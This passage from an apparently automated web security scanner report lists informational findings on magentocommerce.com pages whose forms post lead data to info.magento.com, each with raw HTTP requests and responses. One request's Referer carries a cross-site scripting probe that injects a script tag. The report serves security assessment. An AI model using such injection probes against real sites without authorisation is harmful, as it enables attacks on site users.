Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fproduct%2Ffaq%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:04 GMT
Content-Length: 38677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.122. http://www.magentocommerce.com/product/features  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/features

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/features HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175665; expires=Sat, 11-Aug-2012 15:01:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fproduct%2Ffeatures%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:05 GMT
Content-Length: 47349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.123. http://www.magentocommerce.com/product/hosted-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/hosted-solutions

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/hosted-solutions HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175686; expires=Sat, 11-Aug-2012 15:01:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproduct%2Fhosted-solutions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:26 GMT
Content-Length: 32763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.124. http://www.magentocommerce.com/product/magento-go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-go

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/magento-go HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175671; expires=Sat, 11-Aug-2012 15:01:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fproduct%2Fmagento-go%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:11 GMT
Content-Length: 36074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.125. http://www.magentocommerce.com/product/magento-zend  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/magento-zend

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/magento-zend HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175743; expires=Sat, 11-Aug-2012 15:02:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fproduct%2Fmagento-zend%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:23 GMT
Content-Length: 34344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.126. http://www.magentocommerce.com/product/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/mobile

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/mobile HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175711; expires=Sat, 11-Aug-2012 15:01:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fproduct%2Fmobile%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:52 GMT
Content-Length: 108871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.127. http://www.magentocommerce.com/product/professional-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/professional-edition

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /product/professional-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175663; expires=Sat, 11-Aug-2012 15:01:03 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproduct%2Fprofessional-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:03 GMT
Content-Length: 40267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.128. http://www.magentocommerce.com/products/checkout/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/checkout/cart/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /products/checkout/cart/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:50 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:49 GMT; path=/; domain=magentocommerce.com
Content-Length: 23027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Shopping
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<div>
...[SNIP]...
6.129. http://www.magentocommerce.com/products/job-post.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/job-post.html

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /products/job-post.html HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:58 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:57 GMT; path=/; domain=magentocommerce.com
Content-Length: 31391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Job Post
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<div>
...[SNIP]...
6.130. http://www.magentocommerce.com/products/skin/frontend/enterprise/mc/js/scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /products/skin/frontend/enterprise/mc/js/scripts.js

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /products/skin/frontend/enterprise/mc/js/scripts.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/products/4277a%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eaf34fe383a9/sso/logout
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:04 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Jul 2011 14:52:11 GMT
Connection: keep-alive
Expires: Fri, 19 Aug 2011 15:02:04 GMT
Cache-Control: max-age=604800
Content-Length: 54346

/**
* Magento Enterprise Edition
*
* NOTICE OF LICENSE
*
* This source file is subject to the Magento Enterprise Edition License
* that is bundled with this package in the file LICENSE_EE.txt.

...[SNIP]...


function deactivateLightwindow() {
lightWindow.deactivate();
}

function chooseConactsUsTab(tab) {
       var retUrl = jstr_replace(location.href, '#', '') + '#sales-thank-you';
       var marketoForm = '<form onsubmit="setReturnUrl(location.href, \'#sales-thank-you\');" id="mktForm_1016" action="http://info.magento.com/index.php/leadCapture/save" enctype="application/x-www-form-urlencoded" method="post">'
       +'<fieldset style="margin-bottom:10px;">
...[SNIP]...
6.131. http://www.magentocommerce.com/pt_BR  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pt_BR

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /pt_BR HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176586; expires=Sat, 11-Aug-2012 15:16:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fpt_BR%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:27 GMT
Content-Length: 109441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.132. http://www.magentocommerce.com/roadmap/issue-roadmap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /roadmap/issue-roadmap

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /roadmap/issue-roadmap HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176444; expires=Sat, 11-Aug-2012 15:14:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Froadmap%2Fissue-roadmap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 34644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.133. http://www.magentocommerce.com/ru  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ru

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /ru HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fru%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 69663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.134. http://www.magentocommerce.com/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176207; expires=Sat, 11-Aug-2012 15:10:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:08 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.135. http://www.magentocommerce.com/services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /services/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:12 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.136. http://www.magentocommerce.com/services/contact-us-popup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/contact-us-popup

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /services/contact-us-popup HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
